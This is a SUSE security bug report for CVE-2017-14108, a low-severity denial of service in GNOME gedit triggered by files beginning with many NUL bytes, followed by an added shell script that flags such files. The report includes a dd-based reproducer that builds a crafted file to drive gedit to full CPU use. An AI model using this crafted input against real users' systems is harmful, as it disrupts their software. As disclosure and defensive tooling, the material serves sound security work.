Bug 1057184 (CVE-2017-14108)

Summary: VUL-1: CVE-2017-14108: gedit: CPU consumption via crafted file
Product: [Novell Products] SUSE Security Incidents
Reporter: Alexander Bergmann <abergmann>
Component: Incidents
Assignee: Yifan Jiang <yfjiang>
Status: NEW ---
QA Contact: Security Team bot <security-team>
Severity: Minor
Priority: P4 - Low
CC: smash_bz, yfjiang
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/191438/
Whiteboard: CVSSv2:SUSE:CVE-2017-14108:2.1:(AV:L/AC:L/Au:N/C:N/I:N/A:P) CVSSv3:SUSE:CVE-2017-14108:3.3:(AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L) maint:planned:update
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Description Alexander Bergmann 2017-09-05 09:41:56 UTC
rh#1488335
CVE-2017-14108

libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to
cause a denial of service (CPU consumption) via a file that begins with
many '\0' characters.

Reference:
https://cxsecurity.com/issue/WLB-2017090008

Reproducer:
#> echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt
#> gedit craft.txt &

Now check for 100% CPU utilization.

#> top -b -n 1 | grep gedit
13724 abergma+  20   0  650968  51868  33560 R 100.0 0.317   0:38.66 gedit

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1488335
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14108
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14108
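
A pre-open triage check for the input shape this report describes (a file that begins with many '\0' characters), as an added example that is not part of the original bug report or of gedit. The function names and the default threshold of 4096 bytes are assumptions chosen for illustration; the sample files are constructed.

```shell
#!/bin/sh
# Added example: flag files that start with a long run of NUL bytes
# (the CVE-2017-14108 input shape) before they are opened in gedit.

# Print the number of consecutive NUL bytes at the start of FILE.
# At most LIMIT bytes are inspected, so the cost stays bounded.
# od -v is required: without it od collapses repeated lines into "*".
leading_nuls() {
    file=$1 limit=$2
    od -An -v -tu1 -N "$limit" < "$file" | awk '
        !stop { for (i = 1; i <= NF; i++) { if ($i != 0) { stop = 1; break } n++ } }
        END   { print n + 0 }'
}

# Return 0 (flag the file) when it starts with at least THRESHOLD NULs.
# THRESHOLD defaults to 4096: an assumed triage value, not a measured
# trigger point for the gedit bug.
starts_with_nul_run() {
    file=$1 threshold=${2:-4096}
    [ "$(leading_nuls "$file" "$threshold")" -ge "$threshold" ]
}

# Run the check over three constructed sample files.
demo() {
    tmp=$(mktemp -d) || return 1
    { dd if=/dev/zero bs=1000 count=100 2>/dev/null; printf 'text'; } > "$tmp/padded.txt"
    printf 'plain text\n' > "$tmp/plain.txt"
    : > "$tmp/empty.txt"
    for f in "$tmp"/*.txt; do
        if starts_with_nul_run "$f"; then
            verdict="flag: long leading NUL run"
        else
            verdict="ok"
        fi
        printf '%s: %s\n' "${f##*/}" "$verdict"
    done
    rm -rf "$tmp"
}
demo
```

Such a check can gate files from untrusted sources (mail attachments, downloads) on hosts where gedit through 3.22.1 is still installed.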